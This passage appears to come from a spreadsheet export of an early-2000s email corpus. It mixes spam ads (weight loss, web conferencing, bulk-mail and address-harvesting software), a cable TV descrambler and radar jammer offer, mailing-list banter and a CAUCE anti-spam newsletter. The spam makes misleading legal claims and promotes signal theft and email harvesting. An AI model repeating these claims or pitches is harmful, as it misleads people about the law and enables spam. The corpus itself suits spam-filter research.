         &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkx5uhA2NOqBxDVAmoBameR"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href="http://clickthru.online.com/Click?q=04-k9W0IFQcTWMEZRY98BbBL7kOi_yR"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href="http://clickthru.online.com/Click?q=19-BLe0I2rcgPAJd1cKMZ2Fz8IR7XlR" &gt;FREE for 30 days. Click
             here!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p&gt;&lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiKj5wGYP-_ktQ3DlPfP8N4R" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;!-- subscription management --&gt;
         &lt;font face="ms sans serif, geneva" size="-2"&gt; The e-mail address for your
         subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=44-9nvfzcUNbCoeh7AIz8j1c3ByJ6BtlsRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=59-y53oIEn9uCZVsBSlpW-B_KMqztFR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyEG1KnneDRQA5K-fxuEL59R"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href="http://clickthru.online.com/Click?q=83-U-BXQYJq_uvij7UtuoAABMMPZ9rR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_z4Y1hd7RcCW5CH7esbKRiR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEpaO9J-BZQhaIHsSzky0PR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEDqh_Em4sgVnxXFZcIuInR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=d7-wk3ZQLWDyhknyviRmBekeVktk2eR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy13g_tHep1kOqFb2GVaGyR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e426&amp;ISSUE=2002-07-22" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 .&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=02-qit9nPj-NkIk18p4cDZgQWppY9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lose Inches and Look Great This Summer!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Untitled Document&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"&gt;
   &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
     &lt;tr&gt;
     &lt;td align="center"&gt; &lt;a href="http://track.offer888.net/cgi-bin/trimlife?e=3444431.13"&gt;&lt;img src="http://www.freeze.com/snow/standalones/images/Creative--003.gif" width="450" height="300" border="0"&gt;&lt;/a&gt; 
       &lt;img src="http://www.trimlife.com/tracking/record.asp?entryType=0&amp;offerCode=OFT544" width="1" height="1" alt="" border="0"&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font face=Arial size=1&gt;You received this email because you signed up at one of Offer888.com's websites or you signed up with a party that has contracted with Offer888.com. To unsubscribe from our newsletter, please visit &lt;a href=http://opt-out.offer888.net/?e=jm@netnoteinc.com&gt;http://opt-out.offer888.net/?e=jm@netnoteinc.com&lt;/a&gt;.
  &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Legal TV Descarmbler
 Want to watch Sporting Events?--Movies?--Pay-Per-View?? 
 You can assemble from electronic store parts for about $12.00.
 We Send You:
 E-Z To follow Assembly Instructions
 E-Z To read Original Drawings.
 Electronic parts lists.
 PLUS SOMETHING NEW YOU MUST HAVE! 
 Something you can't do without. 
 THE UP-TO-DATE REPORT: USING A DESCRAMBLER LEGALLY 
 Warning: You should not build a TV Descrambler without 
 reading this report first. 
 Frequently Asked Questions--CABLE TV DESCRAMBLER 
 Q: Will the descrambler work on Fiber, TCI, Jarrod 
 A: The answer is YES. 
 Q: Do I need a converter box?
 A: This plan works with or without a converter box.
 Specific instructions are included in the plans for each! 
 Q: Can the cable company detect that I have the descrambler?
 A: No, the signal descrambles right at the box and does
 not move back through the line! 
 Q: Do I have to alter my existing cable system, 
 television or VCR?
 A: The answer is no! 
 Q: Does this work with my remote control?
 A: The answer is yes. The descrambler is 
 manually controlled--but very easy to use! 
 Q: Can you email me the plans?
 A: No the program comes with an easy to follow picture guide. 
 Q: Does this work everywhere across the country?
 A: Yes, every where in the USA plus England,
 Brazil, Canada and other countries! 
 Q: Is this deal guaranteed?
 A: Yes, if you are unhappy for any reason we will refund your money.
 ORDERING INFORMATION 
 ACT WITHIN THE NEXT 7 DAYS AND RECEIVE TWO FREE BONUSES!!
 THE CABLE MANUAL! 
 This manual contains hard to find information your
 cable company does not want you to know. 
 Also receive The RADAR JAMMER PLANS! Never get another speeding 
 ticket. Build you own radar jammer, this unit will jam police radar 
 so they can't get a reading on your vechicle.
 Radar jammers are legal in 48 states. It is simple to build.
 THE FREE BONUSES ALONE ARE WORTH ACTING NOW! 
 THE CABLE DESCRAMBLER KIT COMES WITH A THIRTY DAY
 MONEY BACK GUARANTEE! IF YOUR NOT COMPLETELY SATISFIED,
 SEND THE CABLE DESCRAMBLER KIT BACK AND YOU KEEP
 THE BONUSES FOR FREE. YOU HAVE NOTHING TO LOSE!!
 ACT NOW AND SAVE!!
 SIMPLY SEND $14.95, THAT'S ONLY $14.95 BUT YOU MUST 
 ORDER WITHIN 7 DAYS FOR THIS SPECIAL PRICE!!!
 SEND $14.95 Add $3.05 shipping/handling TOTAL $18.00 
 CHECK OR, MONEY ORDER, USD ONLY Foreign orders
 must send payment in USD, Drawn on a USA Bank ONLY...
 *******************NO EXCEPTIONS*********************
                                    $18.00
 NET OPS
 PO BOX 4731
 Omaha, NE 68104
 NAME_______________________________________________
 ADDRESS____________________________________________
 CITY/STATE/ZIP______________________________________
 E-MAIL ______________________________________________
 THIS INFORMATION IS SOLD FOR EDUCATIONAL PURPOSES ONLY.
 If you would like to be removed alloff1@btamail.net.cn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: "Ouch. Ouch. Ouch. Ouch. Ouch...."(was Re: My brain hurts)
</t>
  </si>
  <si>
    <t xml:space="preserve">Whatcha call the guy who hangs out with the band?  
 The drummer.
 C
 On Wed, 24 Jul 2002, Lucas Gonze wrote:
 &gt; 
 &gt; Music school jokes --
 &gt; 
 &gt; American conductor and European conductor are talking.  European conductor 
 &gt; says "what a week, I've had 5 rehearsals and a performance."  "That's 
 &gt; nothing," says the American conductor, "I've had five performances and a 
 &gt; rehearsal."  
 &gt; 
 &gt; What's the difference between a spring in the desert surrounded by palm 
 &gt; trees and a violist that plays in tune?  A violist that plays in tune is a 
 &gt; mirage.
 &gt; 
 &gt; What's the difference between a rat and a guitar player?  The rat's got 
 &gt; something to do tonight.
 &gt; 
 &gt; Good thing it's not comedy school.
 &gt; 
 &gt; 
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 &gt; 
 -- 
 "My theology, briefly, is that the universe was dictated but not
           signed."  (Christopher Morley) 
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">It's a fair trade, IMO.  Same for some mid-east bloke who's dying to marry 
 American so he can start his own business.  But BB is right.  When the 
 thrill is gone, she should take his shit.  LOL
 CindyDrinking
 On Thu, 5 Sep 2002, Adam L. Beberg wrote:
 &gt; On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:
 &gt; 
 &gt; &gt; Again, these situations are great, provided everyone is aware that the
 &gt; &gt; relationship is a contractual one -- he wants a maid, a dog and a
 &gt; &gt; prostitute he doesn't have to pay, and she wants a country that isn't
 &gt; &gt; impoverished and teeming with AIDS.
 &gt; 
 &gt; You assume that they just match people up and marry them off, and neither is
 &gt; attracted to the other, which is not the case. Even this has arranged
 &gt; marrage beat by a long way.
 &gt; 
 &gt; Males gets: A wife for a while, and if they actually like each other, for a
 &gt; long time.
 &gt; Female gets: Into Britan, out of a country with no real rights for women, no
 &gt; opportunities for her or her children, out of the polution, AIDS, and an
 &gt; uncountable number of scary tropical diseases. Not to mention in most cases
 &gt; living conditions that us spoiled Americans cannot even comprehend.
 &gt; 
 &gt; Yea, the women is definately getting tha bad end of the deal here.
 &gt; 
 &gt; You're so easy to taunt :)
 &gt; 
 &gt; - Adam L. "Duncan" Beberg
 &gt;   http://www.mithral.com/~beberg/
 &gt;   beberg@mithral.com
 &gt; 
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: that's bullshit
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=49760
 Date: Not supplied
 http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=49760
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;New Web Technology&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
 52"&gt;
 &lt;META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY vLink=3D#c0c0c0 link=3D#c0c0c0 bgColor=3D#EAEAAE leftMargin=3D0&gt;&lt;FON=
 T 
 face=3DMicrosoft, Sans Sarif&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE width=3D560 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;B&gt;&lt;FONT color=3D#42426F size=3D6&gt;UNLIMITED WEB CON=
 FERENCING&lt;/font&gt;&lt;/b&gt;
       &lt;HR&gt;&lt;FONT color=3D#2F2F4F size=3D4&gt;Subscribe to the Web Conference C=
 enter for only $40.00 per month!
 &lt;/FONT&gt;
 &lt;br&gt;
 &lt;FONT color=3D#42426F size=3D3&gt;(Connects up to 15 participants at a time p=
 lus audio charges)&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;P&gt;
 &lt;TABLE width=3D475 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3D"left"&gt;&lt;FONT color=3D#2F2F4F size=3D3&gt;&lt;B&gt;
       &lt;LI&gt;Manage your meetings virtually on line 
       &lt;LI&gt;Application sharing
       &lt;LI&gt;Multi-platform compatible &lt;/B&gt;(no software needed)
       &lt;LI&gt;&lt;B&gt;Call anytime, from anywhere, to anywhere 
       &lt;LI&gt;Unlimited usage for up to 15 participants&lt;/b&gt; (larger groups ava=
 ilabale)
       &lt;LI&gt;&lt;b&gt;Lowest rate $.18 cents per minunte for audio &lt;/b&gt;(toll charge=
 s included)
       &lt;LI&gt;&lt;b&gt;Quality, easy to use service
       &lt;LI&gt;Numerous interactive features&lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;=
 /TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D500 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3D"left"&gt;&lt;FONT color=3D#42426F size=3D4&gt;&lt;B&gt;FREE DEMO&lt;/B&gt;&lt;/fo=
 nt&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;FONT color=3D#42426F size=3D5&gt;&lt;B&gt;Eliminate or Reduce Travel Expense&lt;/b&gt;&lt;/=
 font&gt;
 &lt;BR&gt;&lt;FONT color=3D#2F2F4F size=3D4&gt;&lt;B&gt;
 Try this on for savings... 
 and turn those unnecessary trips into problem solving and fact finding con=
 ferences, 
 saving time and wear and tear on your overworked business staff. 
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D350 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#42426F size=3D4&gt;To find out more abo=
 ut this revolutionary concept,
 fill out the form below.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#2F2F4F size=3D2&gt;&lt;b&gt;Required Input Field&lt;FONT color=3D#5C=
 4033 
 size=3D2&gt;*&lt;/FONT&gt;&lt;/b&gt; 
 &lt;P&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#333300 cellPadding=3D3 width=3D6=
 00 
 borderColorLight=3D#ffffcc&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;
       &lt;FORM action=3Dmailto:inbocks_wc8@yahoo.com?subject=3DConference_Inq=
 uiry 
       method=3Dpost encType=3Dtext/plain&gt;
       &lt;TABLE width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F
           size=3D2&gt;&lt;b&gt;Name&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DNAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Web 
             Address&lt;/b&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT value=3Dhttp:// name=3DURL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Company 
             Name&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DCOMPANY_NAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;
             State&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT size=3D2 name=3DSTATE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Business 
             Phone&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DBUS_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Home 
             Phone&lt;/b&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DHOME_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Email 
             Address&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;&lt;INPUT type=3Dsubmit value=3D"Submit Information" name=3Dsubmit&gt; 
     &lt;/FORM&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;TABLE width=3D350&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#000000 size=3D1&gt;&lt;b&gt;All information g=
 iven herein is strictly confidential and will not be re-distributed
       for any reason other than for the specific use intended.&lt;/font&gt;&lt;/b&gt;&lt;=
 br&gt;
       &lt;FONT face=3D"Arial, Helvetica, sans-serif" color=3D#000000
       size=3D1&gt;To be removed from our distribution lists, please  
       &lt;A href=3D"mailto:d_lete126@eudoramail.com?subject=3DRemove_WebC"&gt;Cl=
 ick 
       here.&lt;FONT color=3D#666600&gt;&lt;/A&gt;&lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TA=
 BLE&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CAUCE NEWS, Vol 6, No 2, June 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 			      CAUCE NEWS
 			  Volume 6, Number 2
 			      June, 2002
 In this issue:
 * Progress of Senate anti-spam bill
 * European Union bans spam
 IF YOU DON'T KNOW WHY YOU GOT THIS MESSAGE: Please see the
 "About This Message" section at the end.
 - --------------------------------------------------------------
 * Progress of Senate anti-spam bill
 Over a year ago, Sen. Conrad Burns (R-MT) introduced S.630, the CAN
 SPAM Act of 2001. This bill would require UCE to have a valid return
 address to facilitate consumers' removal from spam lists. It would
 place enforcement in the hands of the Federal Trade Commission, and
 state Attorneys General. It would also permit Internet Service
 Providers (ISPs) to enforce violations, up to $10 per illegal spam.
 It would preempt any stricter state anti-spam laws.
 The Senate Commerce Committee considered the bill on May 17th, and
 reported it out largely unchanged.  It's not now scheduled for further
 action in the Senate.
 CAUCE has always opposed this bill, since we believe it would lead to
 more spam, not less.  When South Korea passed a similar opt-out law
 last year, spam from Korea soon increased by a factor of 10.
 Our April 2001 press release goes into more detail about the problems
 with S.630:
  http://www.cauce.org/pressreleases/pr-s630.shtml
 We're pleased that the Congress is looking at spam issues again, and
 hope that in the future we can help them create an effective bill that
 the entire Internet community can support.
 - --------------------------------------------------------------
 * European Union bans spam
 GLOBAL INTERNET COMMUNITY APPLAUDS EUROPEAN ANTI-SPAM VOTE
 May 31, 2002 - The Coalition Against Unsolicited Commercial E-Mail
 (CAUCE), EuroCAUCE, CAUCE India, CAUCE Canada and the Coalition Against
 Unsolicited Bulk E-Mail, Australia (CAUBE.au) today applauded the decision
 by the European Parliament to protect European Internet users from the
 practice of unsolicited e-mail advertisements. Yesterday's vote will turn
 Europe into a virtual "spam-free zone" after the formal adoption of the
 directive, making it illegal to send unsolicited e-mail, text message or
 other similar advertisements to individuals with whom companies do not
 have a preexisting business relationship.
 "This is a tremendous day for European Internet users," said EuroCAUCE
 Chairman George Mills. "We are extremely pleased that the European
 Parliament has listened to the citizens of its member countries and added
 the right to be left alone by spammers to its efforts to protect the
 privacy of Europeans."
 While six European Union member countries had already formalized "opt-in"
 in their national laws and regulations, yesterday's vote should turn all
 of Europe into a spam-free zone by the end of 2003.
 "Unfortunately, the rest of the world's Internet-using countries,
 including the United States, now lag behind Europe in their protection
 of Internet users," said CAUCE Chairman Scott Hazen Mueller. "This is
 a tremendous first step, but the rest of the world now needs to follow
 Europe's lead and unite behind protection of Internet users and
 network owners from abusive and costly unsolicited e-mail
 advertising."
 "This decision is the direct result of Internet users throughout the
 European Union standing up for their rights, and Members of the
 European Parliament listening to their constituents," said Mills. "Our
 members and our volunteers performed an integral part of this process,
 translating, lobbying and educating their representatives."
 More information on the E.U. directive is available on the European
 Parliament's Web site &lt;http://www.europarl.eu.int/press/index_en.htm&gt;,
 and a EuroCAUCE analysis is available at
 &lt;http://www.euro.cauce.org/en/amendments1a.html&gt;. More information on
 the international CAUCE network of affiliate organizations is
 available at &lt;http://www.cauce.org&gt;.
 - --------------------------------------------------------------
 About This Message:
 This message was written and broadcast by the Coalition Against
 Unsolicited Commercial E-Mail. It is copyrighted (c) 2002 by the
 Coalition Against Unsolicited Commercial E-Mail.
 We encourage redistribution of this message or items from it, as long
 as they are not spammed anywhere, are on-topic for any forum to which
 you send them, and include our copyright notice.  When in doubt, post
 the URL of our site (http://www.cauce.org) instead, or put it in your
 signature.  Press, broadcast, and Internet media may treat this
 material as they would a press release. For other commercial
 reproduction rights, contact John Levine &lt;johnl@cauce.org&gt;.
 *************************************************************************
 You have received this message because your address was signed up for
 the CAUCE-ANNOUNCE mailing list. If you do not want to receive any
 further messages from this list or think you were subscribed without
 your knowledge, please use the list's home page
        http://lists.cauce.org/mailman/listinfo/cauce-announce
 or send mail to cauce-announce-request@cauce.org with a subject of
 "unsubscribe," or contact J.D. Falk &lt;jdfalk@cauce.org&gt; to be removed
 manually. We exist to eradicate unsolicited e-mail, and, unlike
 spammers, will honor "remove" requests.
 On the other hand, if a friend passed along this message to you and
 you would like to receive the CAUCE NEWS in the future, visit the
 CAUCE web site at http://www.cauce.org to join, or send a message to
 cauce-announce-request@cauce.org with a subject of "subscribe" if you
 want to subscribe without joining.
 *************************************************************************
 For other questions or comments about this message, contact John
 Levine &lt;johnl@cauce.org&gt;.
 Note to PGP users: your editor has a new longer key, which you'll need
 to verify the signature on this message.  It's available on the usual
 key servers.
 				 # #
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (BSD/OS)
 Comment: For info see http://www.gnupg.org
 iEYEARECAAYFAjz+Ey4ACgkQkEiFRdeC/kWGPwCeLJwc5kU+dIWdYvZE4fr1DTRO
 HfEAnjuW22VH9mi1sPPtUuk+6yUpyABW
 =3DL1WX
 -----END PGP SIGNATURE-----
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: marketing news: the latest way to grow your business 572819
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&lt;b&gt;
 &lt;font face="Arial" color="#0000FF"&gt;PROMOTE YOUR PRODUCT OR
 SERVICE TO MILLIONS TODAY!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;
 &lt;font face="Arial" color="#0000FF"&gt;E-MAIL MARKETING&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;
 &lt;font face="Arial"&gt;- Bulk e-mail will make you money so fast, your head will
 spin!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;- Our customers tell us that they would no longer be in
 business without it.&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&lt;b&gt;
 &lt;font face="Arial"&gt;- New collection of software allows you to collect targeted
 e-mail addresses for free!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;font face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;font size="2"&gt;See this product's web
 page&lt;/font&gt;
 &lt;b&gt;&lt;a href="http://81.9.8.7/E-Mail%20Marketing.htm"&gt;CLICK
 HERE&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;
 &lt;font face="Arial" color="#0000FF"&gt;1 MILLION AMERICAN BUSINESS LEADS ON
 CD&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;- If you do telemarketing, mailing, or faxing this list
 will be a gold mine!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;
 &lt;font face="Arial"&gt;- Contains company name, address,
 phone, fax, SIC, # of employees &amp;amp; revenue&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&lt;b&gt;&lt;font face="Arial"&gt;-
 List allows for
 UNLIMITED DOWNLOADS!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&lt;font
 face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;font size="2"&gt;See this product's web page&lt;/font&gt; &lt;b&gt;
 &lt;a href="http://81.9.8.7/Business%20CD.htm"&gt;CLICK HERE&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;
 &lt;font face="Arial" color="#0000FF"&gt;FAX MARKETING SYSTEM&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;
 &lt;font face="Arial"&gt;- Fax broadcasting is the hot new way to market your product
 or service!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;- People are 4 times more likely to read faxes than direct
 mail.&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;- Software turns your computer into a fax blaster with 4
 million  leads on disk!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&lt;font
 face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;font size="2"&gt;See this product's web page&lt;/font&gt; &lt;b&gt;
 &lt;a href="http://81.9.8.7/Fax%20Marketing.htm"&gt;CLICK HERE&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&lt;font
 face="Arial"&gt;&lt;b&gt;Visit our web site or
